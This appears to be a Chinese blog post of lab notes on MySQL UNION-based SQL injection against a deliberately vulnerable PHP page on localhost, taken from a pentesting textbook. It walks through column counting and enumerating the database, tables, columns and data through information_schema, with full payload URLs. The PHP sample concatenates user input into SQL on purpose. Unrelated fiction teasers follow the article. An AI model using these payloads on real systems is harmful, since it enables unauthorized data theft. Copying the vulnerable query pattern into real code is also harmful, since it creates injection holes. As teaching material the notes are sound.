Union注入实验笔记

本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库.

1 环境介绍

union.php


<?php

$con=mysqli_connect("localhost","root","qwer","security");

// 检测连接

if (mysqli_connect_errno())

{

echo "连接失败: " . mysqli_connect_error();

}

$id = $_GET['id'];

$result = mysqli_query($con,"select * from users where `id`=".$id);

while($row = mysqli_fetch_array($result))

{

echo $row['username'] . " " . $row['password'];

echo "<br>";

}

?>

数据库

2 实验过程

访问该网址时页面返回数据库中id=1的用户名与密码

在url后添加一个单引号,再次访问,页面返回与id=1结果不同
报错咧!

访问id=1 and 1=1, 由于and 1=1为真,所以页面应返回与id=1相同的结果,如图所示。

访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如图所示。

可以得出该网站可能存在SQL注入漏洞的结论。接着,使用order by 1-99语句查询该数据表的字段数量,可以理解为order by=1-99,如访问id=1 order by 3,页面返回与id= 1相同的结果,如图所示。

访问id=1 order by 4,页面返回与id=1不同的结果,则字段数为3, 如图所示。
order by 4出问题说明数据库中只有三个字段

在数据库中查询参数ID对应的内容,然后将数据库的内容输出到页面,由于是将数据输出到页面上的,所以可以使用Union注入,且通过order by查询结果,得到字段数为3,所以Union注入的语句如下所示。

union select 1, 2, 3

如图所示,可以看到页面成功执行,但没有返回union select的结果,这是由于代码只返回第一条结果, 所以union select获取的结果没有输出到页面。

可以通过设置参数ID值,让服务端返回union select的结果,例如,把ID的值设置为-1,这样数据库中没有id=-1的数据,所以会返回union select的结果,如图

返回的结果为2 : 3,意味着在union select 1, 2, 3中,2和3的位置可以输入MySQL语句。我们尝试在2的位置查询当前数据库名(使用database ()函数)访问id=1 union select 1,database (),3,页面成功返回了数据库信息,如图所示。


得知了数据库库名后,接下来输入以下命令查询表名。


select table_name from information_schema.tables where table_schema='security' limit 0,1;


http://127.0.0.1/four/4.1.6/union.php?id=-1%20union%20select%201,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%201,1),3

尝试在2的位置粘贴语句,这里需要加上括号,结果如图所示,页面返回了数据库的第一个表名。

如果需要看第二个表名,则修改limit中的第一位数字, 例如使用limit 1, 1就可以获取数据库的第二个表名, 如图所示。
Wow !!!神奇

现在,所有的表名全部查询完毕,已知库名和表名,开始查询字段名,这里以emails表名为例,查询语句如下所示。


select column_name from information_schema.columns where table_ schema='security' and table_ name='emails' limit 0, 1;

尝试在2的位置粘贴语句,括号还是不可少,结果如图所示,获取了emails表的第一个字段名,


http://127.0.0.1/four/4.1.6/union.php?id=-1%20union%20select%201,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%201,1),3

通过使用limit 1, 1,获取了emails表的第二个字段名,如图所示。
好神奇啊

当获取了库名、表名和字段名时,就可以构造SQL语句查询数据库的数据,例如查询字段email_id对应的数据,构造的SQL语句如下所示。

select email_id from security.emails limit 0,1;

结果如图所示,页面返回了email_id的第一条数据。
神奇

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,590评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 86,808评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,151评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,779评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,773评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,656评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,022评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,678评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,038评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,659评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,756评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,411评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,005评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,973评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,203评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,053评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,495评论 2 343